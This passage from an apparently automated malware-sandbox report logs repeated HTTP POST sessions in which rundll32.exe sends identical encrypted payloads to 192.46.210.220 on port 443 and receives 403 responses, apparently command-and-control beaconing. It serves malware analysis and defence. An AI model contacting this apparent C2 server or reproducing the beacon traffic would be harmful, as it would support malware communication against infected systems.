                                                                                                      2021-10-28 02:55:49 UTC385OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:50 UTC395INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:50 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      79192.168.2.350126192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:50 UTC390OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:50 UTC390OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:50 UTC395INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:50 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      8192.168.2.349774192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:53:29 UTC39OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:53:29 UTC39OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:53:30 UTC49INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:53:30 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      80192.168.2.350133192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:53 UTC395OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:53 UTC395OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:54 UTC404INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:54 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      81192.168.2.350134192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:54 UTC400OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:54 UTC400OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:54 UTC405INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:54 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      82192.168.2.350141192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:57 UTC405OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:57 UTC405OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:58 UTC414INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:58 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      83192.168.2.350142192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:57 UTC410OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:57 UTC410OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:58 UTC415INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:58 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      84192.168.2.350149192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:01 UTC415OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:01 UTC415OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:02 UTC424INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:02 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      85192.168.2.350150192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:01 UTC419OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:01 UTC420OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:02 UTC424INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:02 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      86192.168.2.350157192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:05 UTC425OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:05 UTC425OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:06 UTC434INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:06 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      87192.168.2.350158192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:05 UTC429OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:05 UTC429OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:06 UTC434INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:06 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      88192.168.2.350165192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:09 UTC434OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:09 UTC435OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:10 UTC444INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:10 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      89192.168.2.350166192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:56:09 UTC439OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:56:09 UTC439OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:56:10 UTC444INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:56:10 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      9192.168.2.349775192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:53:29 UTC44OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
